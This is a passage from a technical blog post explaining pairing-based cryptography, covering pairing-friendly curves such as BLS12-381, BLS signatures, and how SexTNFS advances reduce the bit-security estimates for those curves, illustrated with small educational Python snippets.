The structure of the input and output for the Tate pairing is a little more complicated than for the Weil pairing. Roughly, the first input point P should still be in the r-torsion, but now the second point Q need not have order r. The output of the Tate pairing is an element of the quotient group \mathbb{F}^*_{p^k} / (\mathbb{F}^*_{p^k})^r.

For the Weil pairing, the embedding degree was picked to ensure we had all r^2 of our torsion points in E(\mathbb{F}_{p^k})[r]. However, for the Tate pairing, we instead only require that \mathbb{F}_{p^k} contains the rth roots of unity, which is satisfied when the order of the curve point r divides (p^k - 1).6

Due to the Balasubramanian-Koblitz Theorem, for all cases other than k = 1, the Weil and Tate embedding degrees are the same. Because of this, for the rest of this blog post we will just refer to k as the embedding degree and think of it in Tate’s context; as finding one number to divide another is simpler than extending a field to ensure that the r-torsion has been totally filled!
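Since, in Tate’s context, the embedding degree is just the multiplicative order of p modulo r, it is simple to compute; a minimal sketch (assuming r is a prime not dividing p):

def embedding_degree(p, r):
    # Smallest k >= 1 with r | p^k - 1, i.e. the order of p modulo r.
    k, t = 1, p % r
    while t != 1:
        t = (t * p) % r
        k += 1
    return k

# Toy examples: r = 5 divides 11^1 - 1 = 10, so the embedding degree is 1,
# while for p = 7, r = 5 we need 7^4 = 2401 = 480*5 + 1, giving k = 4.
print(embedding_degree(11, 5), embedding_degree(7, 5))  # 1 4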

The exponentiation present in the Tate pairing can be costly, but it can be further optimised, and for most implementations of pairing protocols, a third pairing called the Ate-pairing is picked for best performance. As with the Weil pairing, the Ate pairing can be written in terms of the Tate pairing. The optimised Ate pairing has the shortest Miller loop and is the pairing of choice for modern implementations of pairing protocols.

What Makes Curves Friendly?

When picking parameters for cryptographic protocols, we’re concerned with two problems:

  • The protocol must be computationally efficient.
  • The best known attacks against the protocol must be computationally expensive.

Specifically for elliptic curve pairings, which map points on curves to elements of \mathbb{F}_{p^k}, we need to consider the security of the discrete logarithm problem for all groups, while also ensuring that computation of the chosen pairing is efficient.

For the elliptic curve groups, it is sufficient to ensure that the points used generate a prime order subgroup which is cryptographically sized. More subtle is how to pick curves with the “right” embedding degree.

  • If the embedding degree is too large, computing the pairing is computationally very expensive.
  • If the embedding degree is too small, sub-exponential algorithms can solve the discrete log problem in \mathbb{F}^*_{p^k} efficiently.

Given a prime p and picking a random elliptic curve E(\mathbb{F}_p), the expected embedding degree is distributed (fairly) evenly between 0 < k < p. As we are working with cryptographically sized primes p, the embedding degree is then also expected to be cryptographically sized, and the probability of finding a small k is astronomically small.7 Aside from the complexity of computing pairings when the degree is so large, we would also very quickly run out of memory just trying to represent an element of \mathbb{F}^*_{p^k}.

One trick to ensure we find curves with small embedding degree is to consider supersingular curves. For example, picking a prime p \equiv 3 \pmod 4 and defining the curve

E(\mathbb{F}_p): y^2 = x^3 + x,

we always find that the number of points on the curve is \# E(\mathbb{F}_p) = p + 1. Picking k = 2, we can factor (p^2 - 1) = (p+1)(p-1). As the order of the curve \#E(\mathbb{F}_p) divides (p^2 - 1), we see that the embedding degree is k = 2.
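We can sanity-check this with a naive point count over a toy prime (a sketch only suitable for tiny fields):

def count_points(p):
    # Naive count of points on E: y^2 = x^3 + x over F_p (plus infinity).
    sqrt_count = {}
    for y in range(p):
        sqrt_count[(y * y) % p] = sqrt_count.get((y * y) % p, 0) + 1
    return 1 + sum(sqrt_count.get((x**3 + x) % p, 0) for x in range(p))

p = 19  # p = 3 (mod 4)
n = count_points(p)
print(n == p + 1)           # True: #E(F_p) = p + 1
print((p**2 - 1) % n == 0)  # True: the group order divides p^2 - 1, so k <= 2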

The problem with this curve is that ensuring the discrete log problem in \mathbb{F}_{p^2} is cryptographically hard would require such a large p that working with the curves themselves would be too cumbersome. Similar arguments with primes of different forms allow the construction of other supersingular curves, but whatever method is used, all supersingular curves have k \leq 6, which is usually considered too small for pairing-based protocols.

If we’re not finding these curves randomly and we can’t use supersingular curves, then we have to sit down and find friendly curves carefully using mathematics. In particular, we use complex multiplication to construct our special elliptic curves. This has been a point of research for the past twenty years, and cryptographers have been carefully constructing families of curves which:

  • Have large, prime-order subgroups.
  • Have small (but not too small!) embedding degree, (usually) between 12 \leq k \leq 24.

Additionally, the following conditions are considered “nice-to-have”:

  • A carefully picked field characteristic p to allow for fast modular arithmetic.
  • A curve group order r with low hamming weight to speed up Miller’s loop.

Curves with these properties are perfect for pairing-based protocols and so we call them pairing-friendly curves!

An invaluable repository of pairing-friendly curves and links to corresponding references is Aurore Guillevic’s Pairing Friendly Curves. Guillevic is a leading researcher in estimating the security of pairing-friendly curves and has worked to tabulate many popular curves and their best use cases.

A familiar face: BLS12-381

In 2002, Barreto, Lynn and Scott published a paper: Constructing Elliptic Curves with Prescribed Embedding Degrees, and curves generated with this method are in the family of “BLS curves”.

The specific curve BLS12-381 was designed by Sean Bowe for ZCash after research by Menezes, Sarkar and Singh showed that the Barreto–Naehrig curve, which ZCash had previously been using, had a lower than anticipated security.

This is a popular curve used in many protocols that we see while auditing code here at NCC, so it’s a perfect choice as an example of a pairing-friendly curve.

Let’s begin by writing down the curve equations and mention some nice properties of the parameters. The two groups G_1 \subset E_1 and G_2 \subset E_2 have a 255 bit prime order r and are generated by points from the respective curves:

E_1(\mathbb{F}_p) : y^2 = x^3 + 4, \\ \\ E_2(\mathbb{F}_{p^2}) : y^2 = x^3 + 4(1 + u), \qquad \mathbb{F}_{p^2} = \mathbb{F}_p[u] / (u^2 + 1).

The embedding degree is k = 12, G_T = \mathbb{F}^*_{p^{12}}, and the characteristic of the field p has 381 bits (hopefully now the name BLS12-381 makes sense!).

The parameters p and r have some extra features baked into them too. There is in fact a single parameter z = -\texttt{0xd201000000010000} which generates the value of both the characteristic p and the subgroup order r:

p = \tfrac{1}{3} (z - 1)^2(z^4 - z^2 + 1) + z, \qquad r = z^4 - z^2 + 1.

The low Hamming weight of z reduces the cost of the Miller loop when computing pairings, and to aid zkSNARK schemes, r - 1 is chosen to be divisible by a large power of two (precisely, 2^{32}).
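These relations are easy to verify directly; a small sanity check in Python:

z = -0xd201000000010000

r = z**4 - z**2 + 1
p = ((z - 1)**2 * r) // 3 + z

print(p.bit_length(), r.bit_length())  # 381 255
print((r - 1) % 2**32 == 0)            # True: 2^32 divides r - 1
# The embedding degree is the multiplicative order of p modulo r:
print(min(k for k in range(1, 13) if pow(p, k, r) == 1))  # 12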

Ben Edgington has a fantastic blog post that carefully discusses BLS12-381, and is a perfect resource for anyone wanting to know more about this particular curve. For a programming-first look at this curve, NCC’s Eric Schorn has written a set of blog posts implementing pairing on BLS12-381 using Haskell and goes on to look at optimisations of pairing with BLS12-381 by implementing Montgomery arithmetic in Rust and then further improves performance using Assembly.

Something Practical: BLS Signatures

Let’s finish this section with an example, looking at how a bilinear pairing gives an incredibly simple short signature scheme proposed by Boneh, Lynn and Shacham.9 A “short” signature scheme is a signing protocol which returns small signatures (in bits) relative to their cryptographic security.

As above, we work with groups G_1, G_2, G_T of prime order r. For all practical implementations of BLS-signatures, G_1 and G_2 are prime order groups generated by points on elliptic curves and G_T = \mathbb{F}^*_{p^k} where k is the embedding degree. We could, for example, work with the above BLS12-381 curve and have k = 12.

Key Generation is very simple: we pick a random integer x within the range 0 < x < r. The corresponding public key is a = [x]g \in G_1, where g is a generator of G_1.

To sign a message m, we represent the hash of this message H(m) as a point h \in G_2 on the curve.8 The signature is found by performing scalar multiplication of the point: \sigma = [x]h.

Pairing comes into play when we verify the signature \sigma. The verifier uses the broadcast points (a, \sigma) and the message m to check whether

e(g, \sigma) \stackrel{?}{=} e(a, h)

where the scheme uses the bilinearity of the pairing:

e(g, \sigma) = e(g, [x]h) = e(g, h)^x = e([x]g, h) = e(a, h).
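A runnable sketch of the whole flow with the py_ecc library is below; note that the hash-to-curve step is replaced with an insecure toy stand-in (hashing to a scalar reveals the discrete log of h), since the point here is only the verification equation:

import hashlib
import secrets

from py_ecc.bls12_381 import G1, G2, curve_order, multiply, pairing

def toy_hash_to_G2(message):
    # Toy stand-in for a real hash_to_curve: hash to a scalar and multiply
    # the G2 generator. Do not use in practice!
    scalar = int.from_bytes(hashlib.sha256(message).digest(), "big") % curve_order
    return multiply(G2, scalar)

x = secrets.randbelow(curve_order - 1) + 1  # private key, 0 < x < r
a = multiply(G1, x)                         # public key a = [x]g

m = b"an example message"
h = toy_hash_to_G2(m)
sigma = multiply(h, x)                      # signature sigma = [x]h

# Verification: e(g, sigma) == e(a, h); both sides equal e(g, h)^x.
assert pairing(sigma, G1) == pairing(h, a)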

Picking groups

For pairing-friendly curves such as BLS or Barreto-Naehrig (BN) curves, G_1 has points with coordinates in \mathbb{F}_p while G_2 has points with coordinates in \mathbb{F}_{p^2}. This means that the compressed points of G_2 are twice as large as those from G_1 and operations with points from G_2 are slower than those from G_1.

When designing a signature system, protocols can pick for public keys or signatures to be elements of G_1, which would speed up either key generation or signing respectively. For example, ZCash pick G_1 for their signatures, while Ethereum have picked G_1 for their public keys in ETH2. Note that neither choice affects the benchmarks for verification; this is instead limited by the size (and Hamming weight) of the integers k, r and p.

A Bit on Bit Security

Infeasible vs. Impossible

Cryptography is built on a set of very hard but not impossible problems.

For authenticated encryption, such as AES-GCM or ChaCha20-Poly1305, correctly guessing the key allows you to decrypt encrypted data. For asymmetric protocols, whether it’s computing a factor of an RSA modulus, or the private key for an elliptic curve key-pair, you’re usually one integer away from breaking the protocol. Using the above BLS signature example, an attacker knowing Alice’s private key x would allow them to impersonate Alice and sign any chosen message.

Cryptography is certainly not broken though. To ensure our protocols are secure, we instead design problems for which we believe finding a solution in a reasonable amount of time is infeasible. We often describe the complexity of breaking a cryptographic problem by estimating the number of operations we would need to perform to correctly recover the secret. If a certain problem requires performing 2^n operations, then we call this an n bit-strength problem.10

As an example, let’s consider AES-256 where the key is some random 256-bit sequence.11 Currently, the best known attack to decrypt a given AES ciphertext, encrypted with an unknown key, is to simply guess a random key and attempt to decrypt the message. This is known as a brute-force attack. Defining our operation as: “guess a key, attempt to decrypt”, we’ll need at most 2^{256} operations to stumble upon the secret key. We therefore say that AES-256 has 256-bit security. This same argument carries over exactly to AES-128 and AES-192 which have 128- and 192-bit security respectively, or the ChaCha/Salsa ciphers which have either 128 or 256-bit keys.

How big is big?

Humans can have a tough time really appreciating how large big-numbers are,12 but even for the “lower” bound of 128-bit security, estimates end up comparing computation time with a galaxy of computers working for the age of the universe before terminating with the correct key! For those who are interested in a visual picture of quite how big this number is, there’s a fantastic video by 3blue1brown How Secure is 256 bit security and if you’re skimming this blogpost and would rather do some reading, this StackExchange question has some entertaining financial costs for performing 2^{256} operations.

Asymmetric Bit-Security

For a well-designed symmetric cipher, the bit-strength is set by the cost of a brute-force search across the key-space. Similarly for cryptographic hash functions, the bit-strength for preimage resistance is the bit-length of the hash output (collision resistance is always half of this due to the Birthday Paradox).

For asymmetric protocols, estimating the precise bit-strength is more delicate. The security of these protocols relies on mathematical problems which are believed to be computationally hard. For RSA, security is assured by the assumed hardness of integer factorisation. For Diffie-Hellman key exchanges, security comes from the assumed hardness of the computational Diffie-Hellman problem (and, by reduction, the discrete logarithm problem).

Although we can still think of breaking these protocols by “guessing” the secret values (a prime factor of a modulus, the private key of some elliptic curve key-pair), our best attempts are significantly better than a brute-force approach; we can take the mathematical structure which allows the construction of these protocols and build algorithms to recover secret values from shared, public ones.

To have an accurate security estimate for an asymmetric protocol, we must then have a firm grasp of the computational complexity of the state-of-the-art attacks against the specific hard problem we consider. As a result, parameters of asymmetric protocols must be fine-tuned as new algorithms are discovered to maintain assurance of a certain bit-strength.

To attempt to standardise asymmetric ciphers, cryptographers generate their parameters (e.g. picking the size of the prime factors of an RSA modulus, or the group order for a Diffie-Hellman key-exchange) such that the current best known attacks require (at least) 2^{128}, 2^{192} or 2^{256} operations.

RSA Estimates: Cat and Mouse

As a concrete example, we can look at the history of estimates for RSA. When first presented in 1977, Rivest, Shamir and Adleman proposed their conservative security estimates of 664-bit moduli, estimating 4 billion years (corresponding to \sim 2^{77} operations) to successfully factor. Their largest proposed modulus had 1600 bits, with an estimated 130 bit-strength based on the state-of-the-art factoring algorithm at the time (due to Schroeppel).

The RSA algorithm gave a new motivation for the design of faster factoring algorithms, each of which would push the necessary bit-size of the modulus higher to ensure that RSA could remain safe. The current record for integer factorisation is an 829-bit modulus, set on Feb 28th, 2020, taking “only” 2700 core years. Modern estimates require a 3072-bit modulus to achieve at least 128-bit security for RSA implementations.

Estimating computational complexity

Let’s finish this section with a discussion of how we denote computational complexity. The aim is to try and give some intuition for “L-notation” used mainly by researchers in computational number theory for estimating the asymptotic complexity of their algorithms.

Big-O Notation

A potentially more familiar notation for our readers is “Big-\mathcal{O}” notation, which estimates the number of operations as an upper bound based on the input to the algorithm. For an input of length n, a linear time algorithm runs in \mathcal{O}(n), which means if we double the length of n, we would expect the running time to also double. A naive implementation of multiplication of numbers with n digits runs in \mathcal{O}(n^2) or quadratic time. Doubling the length of the input, we would expect a four-times increase in computation time. Other common algorithms run in logarithmic: \mathcal{O}(\log n), polylogarithmic: \mathcal{O}((\log n)^c) or polynomial time: \mathcal{O}(n^c), where c is a fixed constant. An algorithm which takes the same amount of time regardless of input length is known as constant time, denoted by \mathcal{O}(1).

In order to protect against side-channel attacks, constant time algorithms are particularly important when implementing cryptographic protocols. If a secret value is supplied to a variable-time algorithm, an attacker can carefully measure the computation time and learn about private information. By ensuring algorithms run in constant time, side-channel attacks are unable to learn about private values when they are supplied as arguments. Note that constant does not (necessarily) mean fast! Looking up values in hashmaps is \mathcal{O}(1) and fast. Computing the scalar multiplication of elliptic curve points, given a fixed elliptic curve E(\mathbb{F}_q), for cryptographic use should be \mathcal{O}(1), but this isn’t a particularly fast thing to do! In fact, converting operations to be constant time in cryptography will often slow down the protocol, but it’s a small price to pay to protect against timing attacks.

As a final example, we mention an algorithm developed by Shanks: a meet-in-the-middle algorithm for solving the discrete logarithm problem in a generic Abelian group. It is sufficient to consider prime order groups, as the Pohlig-Hellman algorithm allows us to reduce the problem for composite order groups into its prime factors, reconstructing the solution using the Chinese remainder theorem.

For a group of prime order p, a naive brute-force attack on the discrete logarithm problem would take at most \mathcal{O}(p) operations. Shanks’ Baby-Step-Giant-Step (BSGS) algorithm runs in two stages, and like all meet-in-the-middle algorithms, its time complexity can be reduced with a time/space trade-off.

The BSGS algorithm takes in group elements P, Q \in G and looks for an integer n such that Q = [n]P. First we perform the baby steps, where M = \lceil{\sqrt{p}}\;\rceil multiples R_i = [x_i]P are computed and stored in a hashmap. Next come the giant steps, where up to M group elements S_j = Q + [y_j]P are computed. At each giant step, a check for S_j = R_i is performed. When a match is found, the algorithm terminates and returns n = x_i - y_j. All in all, BSGS takes \mathcal{O}(\sqrt{p}) operations to solve the discrete logarithm problem and requires \mathcal{O}(\sqrt{p}) space for the hashmap. Pollard’s rho algorithm achieves the same \mathcal{O}(\sqrt{p}) upper bound time complexity without the need to build the large hashmap, which can be prohibitively expensive as the group’s order grows.
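A minimal sketch of BSGS in the multiplicative group of a prime field is below; the same algorithm works for elliptic curve groups by swapping modular multiplication for point addition:

from math import isqrt

def bsgs(g, h, p, order):
    # Find n with g^n = h (mod p), or return None.
    m = isqrt(order) + 1
    # Baby steps: store g^j for j = 0..m-1 in a hashmap.
    baby, gj = {}, 1
    for j in range(m):
        baby.setdefault(gj, j)
        gj = (gj * g) % p
    # Giant steps: compare h * g^(-i*m) against the table for i = 0..m-1.
    factor, gamma = pow(g, -m, p), h % p  # modular inverse needs Python 3.8+
    for i in range(m):
        if gamma in baby:
            return i * m + baby[gamma]
        gamma = (gamma * factor) % p
    return None

# 2 generates F_101^* (order 100); recover the exponent 47 from 2^47.
print(bsgs(2, pow(2, 47, 101), 101, 100))  # 47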

L-notation

L-notation is a specialised notation used for many of the best-case time complexity approximations for cryptographically hard problems such as factoring, or solving the discrete logarithm for finite fields.

L-notation gives the expected time complexity for an algorithm with input of length n as we allow the length to become infinitely large:

L_n[\alpha, c] = \exp \left\{ (c + o(1))(\ln n)^\alpha (\ln \ln n)^{1-\alpha} \right\}

Despite the intimidating expression, we can get a rough picture by understanding how the sizes of \alpha and c affect the expected computational complexity. For the following, we consider the complexity as a function of the size of the input n.
  • When \alpha \in (0,1) we say an algorithm is sub-exponential
  • When \alpha = 0 the complexity reduces to polynomial time: \mathcal{O}((\log n)^c)
  • When \alpha = 1 the complexity is equivalent to exponential time: \mathcal{O}(n^c)

For improvements, small reductions in c marginally improve performance, while reductions in \alpha usually are linked with significant improvement of an algorithm’s performance. Efforts to reduce the effect of the o(1) term are known as “practical improvements” and allow for minor speed-ups in computation time, without adjusting the complexity estimate.

For cryptographers, L-notation appears mostly when considering the complexity of integer factorisation, or solving the discrete logarithm problem in a finite field. In fact, these two problems are intimately related and many sub-exponential algorithms suitable for one of these problems have been adapted to the other.13

The first sub-exponential algorithm for integer factorisation was the index-calculus attack, developed by Adleman in 1979, which runs in L_n[\frac{1}{2}, \sqrt{2}]. Two years later, Pomerance (who also popularised L-notation itself) showed that his quadratic sieve ran asymptotically faster, in L_n[\frac{1}{2}, 1] time. Lenstra’s elliptic curve factoring algorithm runs in L_p[\frac{1}{2}, \sqrt{2}], with the interesting property that the time is bounded by the smallest prime factor p of n, rather than the number n we wish to factor itself.

The next big step was due to Pollard, Lenstra, Lenstra and Manasse, who developed the number field sieve; an algorithm designed for integer factorisation which would be adapted to also solving the discrete logarithm problem in \mathbb{F}_q^*. Their improved algorithm reduced \alpha in the L-complexity, with an asymptotic running time of L_n[\frac{1}{3},c].

Initially, the algorithm was designed for a specific case where the input integer was required to have a special form: n = r^e \pm s, where both r and s are small. Because of this requirement, this version is known as the special number field sieve (SNFS) and has c = \sqrt[3]{\frac{32}{9}} . This is great for numbers such as the Mersenne numbers: 2^n - 1, but fails for general integers.

Efforts to generalise this algorithm resulted in the general number field sieve (GNFS), with only a small increase of c = \sqrt[3]{\frac{64}{9}} \simeq 1.9 in the complexity. Very quickly, the GNFS was adapted to solving discrete logarithm problems in \mathbb{F}^*_p, but it took another ten years before this was further generalised for \mathbb{F}^*_{q} and renamed as the tower number field sieve (TNFS), which has the same complexity as the GNFS.

As a “hand-wavey” approximation, problems are cryptographically hard when the input has a few hundred bits for \mathcal{O}(\sqrt{n}) complexity and a few thousand bits for sub-exponential complexity. For example, if the best known attack runs in \mathcal{O}(\sqrt{n}) time, we would need n to have 256 bits to ensure 128 bit-strength. For RSA, which can be factored in \sim L_n[\frac{1}{3}, 1.9] time, we need a modulus of 3072 bits to reach 128-bit security.
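With the common simplification o(1) = 0, these figures are easy to reproduce; an illustrative sketch:

from math import log

def l_bits(n_bits, alpha, c):
    # log2 of L_n[alpha, c] with o(1) = 0, for an n_bits-bit input n.
    ln_n = n_bits * log(2)
    return c * ln_n**alpha * log(ln_n) ** (1 - alpha) / log(2)

# GNFS cost for a 3072-bit RSA modulus: ~139 "bits" of work, in the same
# ballpark as the 128-bit target (the o(1) term accounts for the gap).
print(round(l_bits(3072, 1/3, (64/9) ** (1/3))))  # 139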

Estimating the bit security of pairing protocols

With an overview of pairings and complexity estimation for asymmetric protocols, let’s combine these two areas together and look at how we can estimate the security of pairing-friendly curves.

As a concrete example, let’s return to the BLS signature scheme explained at the beginning of the post, and study the assumed hard problems of the protocol together with the asymptotic complexity of their best-known attacks. This offers a great way to look at the security assumptions of a pairing protocol in a practical way. We can take what we study here and apply the same reasoning to any pairing-based protocol which relies on the hardness of the computational Diffie-Hellman problem for its security proofs.

In a BLS signature protocol, the only private value is the private key x which is bounded within the interval 0 < x < r. If this value can be recovered from any public data, the protocol is broken and arbitrary data can be signed by an attacker. We can therefore estimate the bit-security of a pairing-friendly curve in this context by estimating the complexity to recover x from the protocol.

Note: for the following discussion we assume the protocol is implemented as intended and attacks can only come from the solution of problems assumed to be cryptographically hard. Implementation issues such as side-channel attacks, small subgroup attacks or bad randomness are assumed to not be present.

We assume a scenario where Alice has signed a message m with her private key x. Using Alice’s public key a = [x]g_1, Bob will attempt to verify her signature \sigma = [x]h before trusting the message. Eve, our attacker, wants to learn the value of x such that she can sign arbitrary messages while impersonating Alice.

In a standard set up, Eve has access to the following data:

  • Protocol parameters: The pairing-friendly curves E_1, E_2, the characteristic p and the embedding degree k (and hence G_T = \mathbb{F}^*_{p^k})
  • Pairing groups: The prime order subgroups G_1, G_2 and their generators g_i \in G_i
  • Alice’s public key: a = [x]g_1 \in G_1
  • Alice’s signature of the message \sigma = [x]h \in G_2 as well as the message m

Additionally, using these known values Eve can efficiently compute

  • The message as a curve point h = H(m) \in G_2 using the protocol’s chosen hash_to_curve algorithm
  • Elements of the target group: s = e(g_1, h) and t = e(a, h) = e(g_1, \sigma) = s^x \in G_T

To recover the private key, Eve has the option to attempt to solve the discrete log problem in any of the three groups G_1, G_2 and G_T:

x = \log_{g_1}(a), \qquad x = \log_{h}(\sigma), \qquad x = \log_{s}(t)

The bit-security for the BLS-signature is therefore the minimum number of operations needed to be performed to solve any of the three problems.

Elliptic Curve Discrete Logarithm Problem

Given a point and its scalar multiple: P, Q = [n]P \in E(\mathbb{F}_q), the elliptic curve discrete logarithm problem (ECDLP) is to recover the value of n. Since Miller (1986) and Koblitz (1987) independently suggested using this problem for cryptographic protocols, no attacks have been developed for generic curves which are any faster than those which we have for a generic abelian group.14

Therefore, to solve either of the first two problems:

x = \log_{g_1}(a), \qquad x = \log_{h}(\sigma) ,

Eve has no choice but to perform \mathcal{O}(\sqrt{r}) curve operations to recover the value of x. This makes estimating the bit security of these two problems very easy. To enjoy n-bit security for these problems, we only need to ensure that the prime order r has at least 2n bits. Remember that this is only true when the subgroup has prime order. If r were composite, then the number of operations would be \mathcal{O}(\sqrt{p}), where p is the largest prime factor of r, reducing the security of the curve.

Note: As G_1 is usually generated from points on the curve E_1(\mathbb{F}_p) while E_2(\mathbb{F}_{p^2}) is defined over the extension field, solving problem one will be quicker in CPU time than problem two, as an individual operation on E_1 is more efficient than one on E_2.

Finite Field Discrete Logarithm Problem

In contrast to the group of points on an elliptic curve, mathematicians have been able to use the structure of the finite fields \mathbb{F}_{q} to derive sub-exponential algorithms to solve the discrete logarithm problem.

Up until fairly recently, the best known attack for solving the discrete logarithm problem in \mathbb{F}_{q}^*, was the tower number field sieve, which runs in L_q[\frac{1}{3}, \sqrt[3]{\frac{64}{9}}] time. To reach 128 bit security, we would need a 3072 bit modulus q; for pairing-friendly curves with a target group \mathbb{F}_{p^k}^*, we would then need the characteristic of our field to have \sim{3072}/{k} bits. Additionally, if we work within a subgroup of \mathbb{F}_q^*, this subgroup must have an order where the largest prime factor has at least 256 bits to protect against generic attacks such as Pollard’s Rho, or BSGS.

Just as with the original SNFS, where factoring numbers in a special form had a lower asymptotic complexity, recent research in solving the discrete logarithm problem for fields \mathbb{F}^*_{p^k} shows that when either p or k has certain properties the complexity is lowered:

  • The Special Number Field Sieve for \mathbb{F}_{p^n} , showed that when p has a sparse representation, such as the Solinas primes used in cryptography for efficiency of modular arithmetic, the complexity is reduced to L_{p^k}[\frac{1}{3}, c] for c = \lambda \sqrt[3]{\frac{32}{9}} where \lambda is some small multiplicative constant. This factor reduces to one when the primes are large enough.
  • The Extended Tower Number Field Sieve (exTNFS) shows that when we can non-trivially factor k = \eta \kappa, the complexity can reduce to L_{p^k}[\frac{1}{3}, \sqrt[3]{\frac{48}{9}}]. Additionally, this can be used together with the progress from the SNFS allowing a complexity of L_{p^k}[\frac{1}{3}, \sqrt[3]{\frac{32}{9}}], even for medium15 sized primes. The combination of advances is referred to as the SexTNFS.

In pairing-friendly curves, the characteristic of the fields are chosen to be sparse for performance, and the embedding degree is often factorable, e.g. k=12 for both BLS12 and the BN curves. This means the bit-security of many pairing-friendly curves should be estimated by the complexity of the special case SexTNFS, rather than the GNFS.

New Estimates for pairing-friendly curves

Discovery of the SexTNFS meant almost all pairing-friendly curves which had been generated prior had to be re-evaluated to estimate the new bit-security of the discrete logarithm problem.

This was first addressed in Challenges with Assessing the Impact of NFS Advances on the Security of Pairing-based Cryptography (2016), where among other estimates, the authors conducted experiments on the complexity of the 256-bit BN curve, which had a previously estimated security of 128 bits. With the advances of the SexTNFS, they estimated a new complexity between 150 and 110 bits of security, bounded by the value of the constants appearing in the o(1) term in L_n[\alpha, c].

The simplification of o(1) = 0 was graphed in Updating key size estimations for pairings (2019; eprint 2017), which allows an estimate of expected key sizes for pairing-friendly curves. With the advances of the SexTNFS, we must increase the bit length of q = p^k to approximately 5004 bits for 128-bit security and 12871 bits for 192-bit security.

Diagram of bit strength estimates for TNFS, exTNFS and SexTNFS

In the same paper, they argue that precise analysis of the o(1) constant term must be understood, especially for the newer exTNFS and SexTNFS. By using careful polynomial selection in the sieving process, they estimate that the 256-bit BN curve has only 100-bit security, and that other pairing-friendly curves will be similarly affected. They conclude that for 128-bit security, we should be considering pairing-friendly curves with larger primes, such as:

  • A BLS-12 curve over a 461-bit field (previously 381-bit)
  • A BN curve over a 462-bit field (previously 256-bit)

Guillevic released A short-list of pairing-friendly curves resistant to Special TNFS at the 128-bit security level (2019) looking again at the estimated bit security of curves and published a list of the best curves for each case with (at least) 128 bit security. Additionally, there is an open-source repository of SageMath code useful for estimating the security of a given curve https://gitlab.inria.fr/tnfs-alpha/alpha.

In short, Guillevic recommends

For efficient non-conservative pairings, choose BLS12-381 (or any other BLS12 curve or Fotiadis–Martindale curve of roughly 384 bits), for conservative but still efficient, choose a BLS12 or a Fotiadis–Martindale curve of 440 to 448 bits.

with the motivation that

The security between BLS12-446 and BLS12-461 is not worth paying an extra machine word, and is close to the error margin of the security estimate.

Despite the recent changes in security estimates, there is a wealth of new curves which promise 128-bit security, many of which can be dropped into place in current pairing protocols. For those who already have a working implementation using BLS12-381 in a more rigid space, experiments with Guillevic’s sage code seem to suggest that application of the SexTNFS would only marginally reduce the security, to ~120 bits, which is currently still a totally infeasible problem to solve.

Conclusions

TL;DR

Algorithmic improvements have recently reduced the bit-security of pairing-friendly curves used in pairing-based cryptography, but not by enough to warrant serious concern about any current implementations.

Recommendations

The reductions put forward by improvements in the asymptotic complexity of the SexTNFS do not weaken current pairing based protocols significantly enough to cause a mass panic of protocol changes. The drop from 128 bit security to ~120 bit security leaves the protocol secure from all reasonable attacks, but it does change how we talk about the bit-security of specific pairing friendly curves.

XKCD Security

Before a pairing-based protocol with “only” 120 or even 100-bit security is broken, chances are, some other security vulnerability will be exposed which requires less than a universe’s computation power to break. Perhaps a more looming threat is the arrival of quantum computers which break pairing-based protocols just like all cryptographic protocols which depend on the hardness of the discrete logarithm problem for some Abelian group, but that’s for another blog post.

For the most part, the state-of-the-art improvements which affect pairing-based protocols should be understood to ensure our protocols behave as they are described. Popular curves, such as those appearing in BLS12-381, can still be described as safe, pairing-friendly curves, just not 128-bit secure pairing curves. The newly developed curves become important if you wish to advertise security to a specific NIST level, or simply state 128-bit security of a protocol implementation. In these scenarios, we must keep up to date and use the new, fine-tuned curves such as the Fotiadis-Martindale curve FM17 or the modified BLS curve BLS12-440.

Computational Records

As a final comment, it’s interesting to look at where the current computational records stand for cryptographically hard problems and compare them to standard security recommendations:

  • The RSA factoring record is for an 829-bit modulus. The current recommendations are 2048-4096 bit moduli, with 128-bit security for 3072-bit moduli.
  • The NFS Diffie-Hellman record for \mathbb{F}^*_p is for a 795-bit prime modulus. Recommended groups lie in the range of 1536-4096 bit prime order.
  • One ECDLP record was completed on the bitcoin curve secp256k1, with a 114-bit private key. The current recommendation is to use 256-512 bit keys.
  • The current pairing-friendly ECDLP record was against a BN-curve of 114-bit group order. Pairing-friendly curves are usually generated with ~256-bit prime order.
  • The current standing TNFS record is for p^6 with 512 bits. In comparison, BLS12-381 has p^{12} with 4572 bits.

We see that of all these computationally hard problems, the biggest gap between computational records and security estimates is for solving the discrete log problem using the TNFS. Partially, this is historical; solving the discrete log in \mathbb{F}_q^* has only really gained interest because of pairing-based protocols and this area is relatively new. However, even in the context of pairing-friendly curves, the most significant attack used the familiar Pollard’s rho algorithm to solve the discrete logarithm problem on the elliptic curve, rather than the (Sex)TNFS on the output of the pairing.

The margins we give cryptographically hard problems have a certain level of tolerance. Bit strengths of 128 and 256 are targets aimed for during protocol design, and when these advertised margins are attacked and research shows there are novel algorithms which have lower complexity, cryptographers respond by modifying the protocols. However, often after an attack, previous protocols are still robust and associated cryptographic problems are still infeasible to solve.

This is the case for the pairing-friendly curves that we use today. Modern advances have pushed cryptographers to design new 128 bit secure curves, but older curves such as the ones found in BLS12-381 are still great choices for cryptographic protocols and thanks to the slightly smaller primes used, will be that much faster than their 440-bit contemporaries.

Summary

  • Pairing-based cryptography introduces a relatively new set of interesting protocols which have been developed over the past twenty years.
  • A pairing is a map which takes elements from two groups and returns an element in a third group.
  • For all practical implementations, we use elliptic curve pairings, which take points as input and returns elements of \mathbb{F}_{p^k}^*.
  • Pairing-based protocols offer a unique challenge to cryptographers, requiring the generation of special pairing-friendly elliptic curves which allow for efficient pairing, while still maintaining the hardness of the discrete logarithm problem for all three groups.
  • Asymmetric protocols are only as secure as the corresponding best known attacks are slow. If researchers improve an algorithm, parameters for the associated cryptographic problem must be increased, resulting in the protocol becoming less efficient.
  • Increased attention on pairings in a cryptographic context has inspired more research on improving algorithms which can solve the discrete logarithm problem in \mathbb{F}_{p^k}^*.
  • The newly discovered exTNFS, combined with the SNFS, allows a reduction in the complexity of solving the discrete logarithm problem in \mathbb{F}^*_{p^k} via the SexTNFS.
  • For pairing-friendly curves generated without knowledge of these algorithms (or before their discovery), the true bit-strength of a curve may be lower than advertised.
  • Although research on TNFS and related algorithms is still ongoing, new improvements are only expected to happen in the o(1) contribution of L_n[\alpha, c], which could only cause small modifications to the bit complexity. Any substantial change in complexity would be as surprising as a change in the security of the ECDLP.
  • These modifications should only really concern implementations which promise a specific bit-security; from the point of view of real-world security, the improvements offered by the SexTNFS and related algorithms are more psychological than practical.

Appendix: Mathematical Notation

